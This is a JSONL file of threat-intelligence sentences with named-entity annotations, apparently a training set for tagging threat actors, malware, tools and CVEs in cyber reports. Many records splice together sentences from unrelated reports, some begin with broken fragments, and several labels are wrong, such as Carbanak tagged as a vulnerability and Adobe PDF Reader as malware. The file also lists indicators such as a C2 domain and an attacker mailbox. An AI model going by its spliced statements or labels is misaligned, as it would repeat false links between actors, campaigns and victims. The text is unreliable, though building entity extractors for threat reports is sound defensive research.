{"text": "] com9oo91e [ . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks . Overall , the combination of a relatively high number of “ Shanghai ” registrations with obviously false registration examples in other registrations suggests a partially uncoordinated domain registration campaign from 2004 until present , in which some registrants tried to fabricate non-Shanghai locations but others did not . Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: government institutions": [[71, 94]]}, "info": {"id": "cyberner_stix_train_004376", "source": "cyberner_stix_train"}}
{"text": "It is considered to be the most advanced group of the three , and is focused on high-profile targets in the Middle East , North America , Europe and Asia .", "spans": {}, "info": {"id": "cyberner_stix_train_004377", "source": "cyberner_stix_train"}}
{"text": "Display a message box .", "spans": {}, "info": {"id": "cyberner_stix_train_004378", "source": "cyberner_stix_train"}}
{"text": "Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan . In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems .", "spans": {"TOOL: Potao": [[20, 25]], "ORGANIZATION: U.S.-based defense": [[381, 399]], "ORGANIZATION: aerospace technologies": [[485, 507]], "ORGANIZATION: combat processes": [[510, 526]], "ORGANIZATION: naval defense systems": [[533, 554]]}, "info": {"id": "cyberner_stix_train_004379", "source": "cyberner_stix_train"}}
{"text": "Windows Credential Editor ( WCE ) — obtains passwords from memory . gsecdump — obtains passwords from memory . winrar — compresses data for Exfiltration . nbtscan — scans NetBIOS name servers .", "spans": {"TOOL: Windows Credential Editor": [[0, 25]], "TOOL: WCE": [[28, 31]], "TOOL: gsecdump": [[68, 76]], "TOOL: winrar": [[111, 117]], "TOOL: nbtscan": [[155, 162]], "TOOL: NetBIOS": [[171, 178]]}, "info": {"id": "cyberner_stix_train_004380", "source": "cyberner_stix_train"}}
{"text": "Machine translation of this tweet reads : “ Watch out for online banking : Emotet reloads TrickBot . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications .", "spans": {"MALWARE: Emotet": [[75, 81]], "MALWARE: TrickBot": [[90, 98]], "THREAT_ACTOR: APT41": [[111, 116]], "VULNERABILITY: exploit": [[153, 160]], "VULNERABILITY: CVE-2019-3396": [[170, 183]], "ORGANIZATION: financial": [[313, 322]], "ORGANIZATION: government": [[325, 335]], "ORGANIZATION: energy": [[338, 344]], "ORGANIZATION: chemical": [[347, 355]], "ORGANIZATION: telecommunications": [[362, 380]]}, "info": {"id": "cyberner_stix_train_004381", "source": "cyberner_stix_train"}}
{"text": "The use of the client application differs from many other webshells that the actor would interact with in a browser window .", "spans": {}, "info": {"id": "cyberner_stix_train_004382", "source": "cyberner_stix_train"}}
{"text": "During these intrusions , LEAD ’s objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": {"THREAT_ACTOR: LEAD": [[26, 30]]}, "info": {"id": "cyberner_stix_train_004383", "source": "cyberner_stix_train"}}
{"text": "The communication with the server is a handshake using an encryption algorithm ( Camellia ) .", "spans": {}, "info": {"id": "cyberner_stix_train_004384", "source": "cyberner_stix_train"}}
{"text": "Most mobile malware is designed to steal users ’ money , including SMS-Trojans , and lots of backdoors and Trojans . Emissary Panda has used many ways with the most notable being the exploits from the Hacking Team leak . In addition to the two compromised universities , thanks to the C&C URL format used by the attackers we have reasons to think that at least three additional Hong Kong universities may have been compromised using these same ShadowPad and Winnti variants . Further , NIST does not endorse any commercial products that may be mentioned on these sites .", "spans": {"TOOL: C&C": [[285, 288]], "MALWARE: ShadowPad": [[444, 453]], "MALWARE: Winnti": [[458, 464]], "ORGANIZATION: NIST": [[486, 490]]}, "info": {"id": "cyberner_stix_train_004385", "source": "cyberner_stix_train"}}
{"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks": [[139, 150]], "THREAT_ACTOR: BRONZE UNION": [[166, 178]], "THREAT_ACTOR: TG-3390": [[211, 218]], "ORGANIZATION: CTU": [[229, 232]], "ORGANIZATION: People's Republic": [[267, 284]]}, "info": {"id": "cyberner_stix_train_004386", "source": "cyberner_stix_train"}}
{"text": "The full list of banking applications targeted is included in the appendix . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound .", "spans": {"MALWARE: Hussarini": [[131, 140]], "MALWARE: Retriever": [[299, 308]], "MALWARE: .NET downloader": [[314, 329]]}, "info": {"id": "cyberner_stix_train_004387", "source": "cyberner_stix_train"}}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 .", "spans": {"MALWARE: bait document": [[5, 18]], "MALWARE: Word document": [[68, 81]], "VULNERABILITY: CVE-2012-0158": [[102, 115]], "THREAT_ACTOR: Turla": [[287, 292]], "MALWARE: Kazuar": [[353, 359]]}, "info": {"id": "cyberner_stix_train_004388", "source": "cyberner_stix_train"}}
{"text": "Exodus is equipped with extensive collection and interception capabilities . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor . These commands can be issued to a specific victim based on the UID generated on each target ( by using the disk serial and contextual information such as the hostname , the antivirus and the OS ) or to all of them . One explanation for this could be that that they used the region as a test zone ; another would be that the threat actor runs the operation from those locations , although it could also be a false flag meant to point the researchers on the wrong path .", "spans": {"MALWARE: Exodus": [[0, 6]], "THREAT_ACTOR: threat group": [[108, 120]], "TOOL: ISMAgent backdoor": [[232, 249]], "THREAT_ACTOR: threat actor": [[576, 588]]}, "info": {"id": "cyberner_stix_train_004389", "source": "cyberner_stix_train"}}
{"text": "The malware , dubbed “ Judy ” , is an auto-clicking adware which was found on 41 apps developed by a Korean company . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . If the target filename is incorrect or invalid the plugin file is deleted and the registry value is erased . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"MALWARE: Judy": [[23, 27]], "ORGANIZATION: gaming organizations": [[167, 187]], "MALWARE: OT malware": [[379, 389]]}, "info": {"id": "cyberner_stix_train_004390", "source": "cyberner_stix_train"}}
{"text": "During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]], "ORGANIZATION: oil refining": [[87, 99]], "ORGANIZATION: petrochemicals": [[104, 118]], "ORGANIZATION: Symantec": [[150, 158]]}, "info": {"id": "cyberner_stix_train_004391", "source": "cyberner_stix_train"}}
{"text": "SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year .", "spans": {"MALWARE: SPLM": [[0, 4]]}, "info": {"id": "cyberner_stix_train_004392", "source": "cyberner_stix_train"}}
{"text": "Usually they would upload a clean version back on Google Play the very same day . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies . In the ProCC campaigns , the downloaded files are Delphi binaries . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"SYSTEM: Google Play": [[50, 61]], "ORGANIZATION: electric companies": [[185, 203]], "THREAT_ACTOR: ProCC": [[213, 218]], "TOOL: Delphi": [[256, 262]], "THREAT_ACTOR: Adversaries": [[274, 285]]}, "info": {"id": "cyberner_stix_train_004393", "source": "cyberner_stix_train"}}
{"text": "The second artifact – identified across this report as Artifact #2 – -has the following attributes :", "spans": {}, "info": {"id": "cyberner_stix_train_004394", "source": "cyberner_stix_train"}}
{"text": "Heaven ’ s gate is still in use in 2017 Stage 2 : A second multi-platform virtual machine The 64-bit stage 2 malware implements another loader combined with another virtual machine . The HTA files contained job descriptions and links to job postings on popular employment websites . One of the payloads we encountered was encoded inside an image of Kaito Kuroba1 , the gentleman thief character from a popular Japanese manga series . Exploitation of CVE-2023 - 4966 will not crash the NSPPE process and generate memory core dump files .", "spans": {"MALWARE: HTA files": [[187, 196]], "VULNERABILITY: CVE-2023 - 4966": [[450, 465]]}, "info": {"id": "cyberner_stix_train_004395", "source": "cyberner_stix_train"}}
{"text": "For example , the US ( with around 303k infections ) , Saudi Arabia ( 245k ) , Australia ( 141k ) and the UK ( 137k ) . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others . In addition , the contents of each Loader DLL E-TOOL differs from package to package , as does the encrypted data included in the ZIP file . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": {"ORGANIZATION: military personnel": [[206, 224]], "ORGANIZATION: businessmen": [[229, 240]], "TOOL: Loader": [[293, 299]], "TOOL: DLL E-TOOL": [[300, 310]], "SYSTEM: the file system": [[570, 585]]}, "info": {"id": "cyberner_stix_train_004396", "source": "cyberner_stix_train"}}
{"text": "Parts of the PUTTER PANDA toolset and tradecraft have been previously documented , both by CrowdStrike , and in open source , where they are referred to as the MSUpdater group . In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[13, 25]], "ORGANIZATION: CrowdStrike": [[91, 102]], "THREAT_ACTOR: MSUpdater group": [[160, 175]], "ORGANIZATION: ESET": [[240, 244]], "MALWARE: Win32/Potao": [[285, 296]], "MALWARE: Win32/FakeTC samples": [[301, 321]]}, "info": {"id": "cyberner_stix_train_004397", "source": "cyberner_stix_train"}}
{"text": "In case of mha-report.doc the malicious activity triggered only when the show document button was clicked , when this event occurs the macro code calls a subroutine CommandButton1_Click() which in turn calls a malicious obfuscated function ( Bulbaknopka() ) .", "spans": {"FILEPATH: mha-report.doc": [[11, 25]], "TOOL: macro code": [[135, 145]], "TOOL: CommandButton1_Click()": [[165, 187]], "TOOL: Bulbaknopka()": [[242, 255]]}, "info": {"id": "cyberner_stix_train_004398", "source": "cyberner_stix_train"}}
{"text": "Seeing that the developer did not take any measures to protect his identity , it seems likely that his intentions weren ’ t dishonest at first – and this is also supported by the fact that not all his published apps contained unwanted ads . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"TOOL: DarkPulsar": [[241, 251]], "TOOL: backdoor": [[322, 330]], "MALWARE: sipauth32.tsp": [[339, 352]], "FILEPATH: Documents": [[415, 424]], "TOOL: flash": [[434, 439]], "VULNERABILITY: exploit": [[440, 447], [509, 516]], "TOOL: VirusTotal": [[520, 530]]}, "info": {"id": "cyberner_stix_train_004399", "source": "cyberner_stix_train"}}
{"text": "Once the victim presses the Enable content button , the embedded macro is executed .", "spans": {"TOOL: Enable content button": [[28, 49]], "TOOL: macro": [[65, 70]]}, "info": {"id": "cyberner_stix_train_004400", "source": "cyberner_stix_train"}}
{"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated .", "spans": {"TOOL: JHUHUGIT": [[4, 12]], "VULNERABILITY: Java zero-day": [[110, 123]], "VULNERABILITY: CVE-2015-2590": [[126, 139]], "MALWARE: Skipper": [[157, 164]], "THREAT_ACTOR: Turla": [[192, 197]], "MALWARE: Gazer": [[232, 237]]}, "info": {"id": "cyberner_stix_train_004401", "source": "cyberner_stix_train"}}
{"text": "MCI is Saudi Arabia ’s Ministry of Commerce and Investment .", "spans": {"ORGANIZATION: MCI": [[0, 3]], "ORGANIZATION: Saudi Arabia ’s Ministry of Commerce and Investment": [[7, 58]]}, "info": {"id": "cyberner_stix_train_004402", "source": "cyberner_stix_train"}}
{"text": "The second notable cluster comprises of two campaigns that were possibly aimed at gathering information on Georgia S-LOC-NATO relations .", "spans": {"ORGANIZATION: Georgia S-LOC-NATO": [[107, 125]]}, "info": {"id": "cyberner_stix_train_004403", "source": "cyberner_stix_train"}}
{"text": "sendAll function used to spread malicious messages to the contact list . We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"THREAT_ACTOR: actors": [[94, 100]], "TOOL: Sublime Text": [[172, 184]], "TOOL: Media application": [[224, 241]], "THREAT_ACTOR: Ke3chang": [[310, 318]], "TOOL: Java": [[340, 344]], "VULNERABILITY: zero-day": [[345, 353]], "VULNERABILITY: CVE-2012-4681": [[370, 383]], "FILEPATH: Microsoft Word": [[429, 443]], "VULNERABILITY: CVE-2010-3333": [[446, 459]], "MALWARE: Adobe PDF Reader": [[466, 482]], "VULNERABILITY: CVE-2010-2883": [[485, 498]]}, "info": {"id": "cyberner_stix_train_004404", "source": "cyberner_stix_train"}}
{"text": "However , GPP does not treat new apps and updates any differently from an analysis perspective . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella . Keylogging , ZXARPS ( IP and URL spoofing ) , and SYNFlood are some of the interesting features added to version 3.2 . The content of the form is legitimate and targets Ukrainian government organizations , as seen in the image below .", "spans": {"THREAT_ACTOR: Winnti Umbrella": [[266, 281]], "MALWARE: ZXARPS": [[297, 303]], "ORGANIZATION: Ukrainian government organizations": [[453, 487]]}, "info": {"id": "cyberner_stix_train_004405", "source": "cyberner_stix_train"}}
{"text": "Once it has been installed , it requests permissions from the user so that it can steal sensitive data , manipulate SMS messages , and potentially infect contacts of the user . The main payload is usually Imminent Monitor RAT; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . both attributed to Chinese government affiliated groups .", "spans": {"MALWARE: Monitor RAT;": [[214, 226]], "MALWARE: LuminosityLink RAT": [[292, 310]], "MALWARE: NetWire RAT": [[313, 324]], "MALWARE: NjRAT": [[331, 336]]}, "info": {"id": "cyberner_stix_train_004406", "source": "cyberner_stix_train"}}
{"text": "The iOS versions were available outside the app store , through phishing sites , and abused the Apple Developer Enterprise program . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia .", "spans": {"SYSTEM: iOS": [[4, 7]], "SYSTEM: app store": [[44, 53]], "ORGANIZATION: Apple Developer Enterprise": [[96, 122]], "VULNERABILITY: Carbanak": [[205, 213]], "ORGANIZATION: financial industry": [[230, 248]], "ORGANIZATION: payment providers": [[259, 276]], "ORGANIZATION: retail industry": [[279, 294]], "ORGANIZATION: PR companies": [[299, 311]], "MALWARE: fake resume application": [[377, 400]], "MALWARE: letter": [[408, 414]]}, "info": {"id": "cyberner_stix_train_004407", "source": "cyberner_stix_train"}}
{"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {"MALWARE: Catchamas": [[0, 9]]}, "info": {"id": "cyberner_stix_train_004408", "source": "cyberner_stix_train"}}
{"text": "The Base64-encoded data is inserted into the following json object , which contains the individual names .", "spans": {}, "info": {"id": "cyberner_stix_train_004409", "source": "cyberner_stix_train"}}
{"text": "Recent campaigns see APT28 group return to covert intelligence gathering operations in Europe and South America .", "spans": {"THREAT_ACTOR: APT28": [[21, 26]]}, "info": {"id": "cyberner_stix_train_004410", "source": "cyberner_stix_train"}}
{"text": "] com svc [ . They are often targeted simultaneously with other ethnic minorities and religious groups in China . FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"ORGANIZATION: ethnic minorities": [[64, 81]], "ORGANIZATION: religious groups": [[86, 102]], "ORGANIZATION: FireEye": [[114, 121]], "TOOL: Google": [[320, 326]], "TOOL: Adobe": [[359, 364]]}, "info": {"id": "cyberner_stix_train_004412", "source": "cyberner_stix_train"}}
{"text": "For Android 4.4.4 and older , the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so , and for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so . Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . While there is a marked interest in Brazilian victims , our telemetry shows that their reach has extended to other countries in Latin America and beyond . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": {"SYSTEM: Android 4.4.4": [[4, 17]], "SYSTEM: Android": [[120, 127]], "THREAT_ACTOR: Desert Falcons": [[214, 228]], "VULNERABILITY: CVE-2013 - 0640": [[681, 696]]}, "info": {"id": "cyberner_stix_train_004413", "source": "cyberner_stix_train"}}
{"text": "Cannon logs into the trala.cosh2@post.cz account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": {"MALWARE: Cannon": [[0, 6]], "EMAIL: trala.cosh2@post.cz": [[21, 40]], "TOOL: emails": [[71, 77]]}, "info": {"id": "cyberner_stix_train_004414", "source": "cyberner_stix_train"}}
{"text": "Furthermore , APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": {"THREAT_ACTOR: APT32": [[14, 19]], "ORGANIZATION: public sector": [[103, 116]], "THREAT_ACTOR: Scarlet Mimic": [[143, 156]], "ORGANIZATION: minority groups": [[212, 227]], "ORGANIZATION: supporters": [[245, 255]], "ORGANIZATION: anti-terrorist organizations": [[365, 393]]}, "info": {"id": "cyberner_stix_train_004415", "source": "cyberner_stix_train"}}
{"text": "The permissions on the first version of the malware lay out the foundations of a spying trojan . Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address . While the malware used in the attacks were not very complicated by nature , these proved very effective . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {"TOOL: Blue and Green Lambert samples": [[109, 139]]}, "info": {"id": "cyberner_stix_train_004416", "source": "cyberner_stix_train"}}
{"text": "Figure 3 below shows a diff with the LuckyStrike macro on the left and Sofacy macro on the right , where everything except the file path and randomly generated values in the macro are exactly the same , including the obfuscation attempts that use concatenation to build strings .", "spans": {"TOOL: LuckyStrike": [[37, 48]], "TOOL: macro": [[49, 54], [78, 83], [174, 179]], "THREAT_ACTOR: Sofacy": [[71, 77]]}, "info": {"id": "cyberner_stix_train_004417", "source": "cyberner_stix_train"}}
{"text": "In the case of this spyware , search for app named TikTok Pro . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . Kimsuky is a North Korean based threat group that has been active since at least September 2013 .", "spans": {"SYSTEM: TikTok Pro": [[51, 61]], "MALWARE: Okrum malware": [[96, 109]], "MALWARE: backdoors": [[202, 211]], "THREAT_ACTOR: Kimsuky": [[214, 221]]}, "info": {"id": "cyberner_stix_train_004418", "source": "cyberner_stix_train"}}
{"text": "The extraction method is the same , but the encryption algorithm ( also XOR ) is much simpler . In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER , which includes a domain generation algorithm ( DGA ) for command and control . The alpha channel byte remains unchanged . In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": {"ORGANIZATION: FireEye": [[111, 118]], "THREAT_ACTOR: APT34": [[128, 133]], "TOOL: POWRUNER PowerShell-based backdoor": [[189, 223]], "TOOL: BONDUPDATER": [[243, 254]], "THREAT_ACTOR: Hack520": [[458, 465]], "THREAT_ACTOR: Winnti": [[499, 505]]}, "info": {"id": "cyberner_stix_train_004419", "source": "cyberner_stix_train"}}
{"text": "] com md5c [ . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]], "ORGANIZATION: higher education": [[40, 56]], "ORGANIZATION: travel services": [[59, 74]], "ORGANIZATION: news/media firms": [[81, 97]], "ORGANIZATION: Mandiant": [[189, 197]], "MALWARE: POSHSPY": [[219, 226]], "THREAT_ACTOR: APT29": [[272, 277]]}, "info": {"id": "cyberner_stix_train_004420", "source": "cyberner_stix_train"}}
{"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload .", "spans": {"TOOL: email": [[19, 24]], "EMAIL: trala.cosh2@post.cz": [[28, 47]], "MALWARE: Cannon": [[121, 127]], "MALWARE: Trojan": [[128, 134]]}, "info": {"id": "cyberner_stix_train_004421", "source": "cyberner_stix_train"}}
{"text": "CTU researchers discovered evidence that the threat actors were not only leveraging the company 's remote access infrastructure , but were also using the company 's endpoint management platform , Altiris , to move laterally through the network .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: Altiris": [[196, 203]]}, "info": {"id": "cyberner_stix_train_004422", "source": "cyberner_stix_train"}}
{"text": "Adding connections to FakeSpy We have been seeing activity from XLoader since 2018 , and have since followed up our initial findings with a detailed research revealing a wealth of activity dating back to as early as January 2015 , which outlined a major discovery—its connection to FakeSpy . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . Ping mode will also be set if exceptions occur more than three times during text . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": {"MALWARE: FakeSpy": [[22, 29], [282, 289]], "MALWARE: XLoader": [[64, 71]], "THREAT_ACTOR: APT18": [[296, 301]], "TOOL: hcdLoader RAT": [[321, 334]]}, "info": {"id": "cyberner_stix_train_004423", "source": "cyberner_stix_train"}}
{"text": "This fake notification tactic is used to redirect the user 's attention , meanwhile the app hides itself , making the user believe the app to be faulty . We can observe that the sample is very recent , created on Thursday , July 4 . The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report .", "spans": {"MALWARE: sample": [[178, 184]], "MALWARE: Winnti": [[322, 328]], "ORGANIZATION: Novetta": [[365, 372]]}, "info": {"id": "cyberner_stix_train_004424", "source": "cyberner_stix_train"}}
{"text": "BLOCKER_EXTORTIONIST_START – display HTML page of the ransomware . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability .", "spans": {"MALWARE: Microsoft Word attachment": [[151, 176]], "VULNERABILITY: CVE-2017-0199": [[209, 222]], "TOOL: ZeroT Trojan": [[237, 249]], "TOOL: PlugX Remote Access Trojan": [[281, 307]], "TOOL: RAT": [[310, 313]], "THREAT_ACTOR: Leafminer": [[336, 345]], "MALWARE: Python script": [[370, 383]]}, "info": {"id": "cyberner_stix_train_004425", "source": "cyberner_stix_train"}}
{"text": "From our analysis of the TrickMo mobile malware , it is apparent that TrickMo is designed to break the newest methods of OTP and , specifically , TAN codes often used in Germany . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 .", "spans": {"MALWARE: TrickMo": [[25, 32], [70, 77]], "THREAT_ACTOR: Emissary Panda": [[191, 205]], "VULNERABILITY: vulnerability": [[235, 248]], "VULNERABILITY: CVE-2019-0604": [[284, 297]]}, "info": {"id": "cyberner_stix_train_004426", "source": "cyberner_stix_train"}}
{"text": "Also , when an SMS arrives , the Trojan puts the phone into silent mode and switches off the screen so the user doesn ’ t notice that a new SMS has arrived . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus .", "spans": {"THREAT_ACTOR: OilRig": [[223, 229]], "MALWARE: Clayslide delivery documents": [[237, 265]], "ORGANIZATION: governments": [[507, 518]], "THREAT_ACTOR: ZINC/Lazarus": [[693, 705]]}, "info": {"id": "cyberner_stix_train_004428", "source": "cyberner_stix_train"}}
{"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {"THREAT_ACTOR: MONSOON": [[77, 84]], "THREAT_ACTOR: HANGOVER group": [[126, 140]]}, "info": {"id": "cyberner_stix_train_004429", "source": "cyberner_stix_train"}}
{"text": "Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": {"THREAT_ACTOR: Machete": [[276, 283]], "ORGANIZATION: we": [[360, 362]], "THREAT_ACTOR: APT38": [[403, 408]], "ORGANIZATION: banking": [[525, 532]]}, "info": {"id": "cyberner_stix_train_004430", "source": "cyberner_stix_train"}}
{"text": "Manufacturers should be keeping close tabs on what software ends up on their devices . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . C2 : log.gokickes.com .", "spans": {"VULNERABILITY: CVE-2017-1182": [[174, 187]], "MALWARE: Microsoft Equation Editor": [[205, 230]], "MALWARE: EQNEDT32.exe": [[233, 245]], "TOOL: C2": [[297, 299]], "DOMAIN: log.gokickes.com": [[302, 318]]}, "info": {"id": "cyberner_stix_train_004431", "source": "cyberner_stix_train"}}
{"text": "Since the initial appearance of Operation AppleJeus , we can see that over time the authors have changed their modus operandi considerably .", "spans": {}, "info": {"id": "cyberner_stix_train_004432", "source": "cyberner_stix_train"}}
{"text": "While the report appears to contain numerous inaccuracies , some of the indicators of compromises are legitimate and appear to be correctly attributed to Sofacy .", "spans": {"THREAT_ACTOR: Sofacy": [[154, 160]]}, "info": {"id": "cyberner_stix_train_004433", "source": "cyberner_stix_train"}}
{"text": "We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": {"ORGANIZATION: CTU": [[225, 228]], "THREAT_ACTOR: TG-3390": [[255, 262]]}, "info": {"id": "cyberner_stix_train_004434", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , we can’t get all the related files as some payloads were only executed in memory .", "spans": {}, "info": {"id": "cyberner_stix_train_004435", "source": "cyberner_stix_train"}}
{"text": "Researchers from the IBM X-Force Incident Response and Intelligence Services ( IRIS ) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations .", "spans": {"ORGANIZATION: IBM X-Force Incident Response and Intelligence Services ( IRIS ) team": [[21, 90]]}, "info": {"id": "cyberner_stix_train_004436", "source": "cyberner_stix_train"}}
{"text": "In the image below , we see a log TrickMo sent to the attacker upon becoming the default SMS app . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 .", "spans": {"MALWARE: TrickMo": [[34, 41]], "THREAT_ACTOR: Poseidon Group": [[103, 117]], "ORGANIZATION: executives": [[287, 297]]}, "info": {"id": "cyberner_stix_train_004437", "source": "cyberner_stix_train"}}
{"text": "For example , we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior , exemplifying the rapid evolution of mobile threats that we have also observed on other platforms . One interesting note about the criminal activity of Gorgon Group is their usage of Bitly . . The differences between commercial spyware and digital extortion attacks You may have received an email something like , “ We know you ’ve visited this adult website .", "spans": {"SYSTEM: Android": [[63, 70]], "THREAT_ACTOR: Gorgon Group": [[270, 282]], "TOOL: Bitly": [[301, 306]], "TOOL: commercial spyware": [[335, 353]], "THREAT_ACTOR: digital extortion attacks": [[358, 383]]}, "info": {"id": "cyberner_stix_train_004438", "source": "cyberner_stix_train"}}
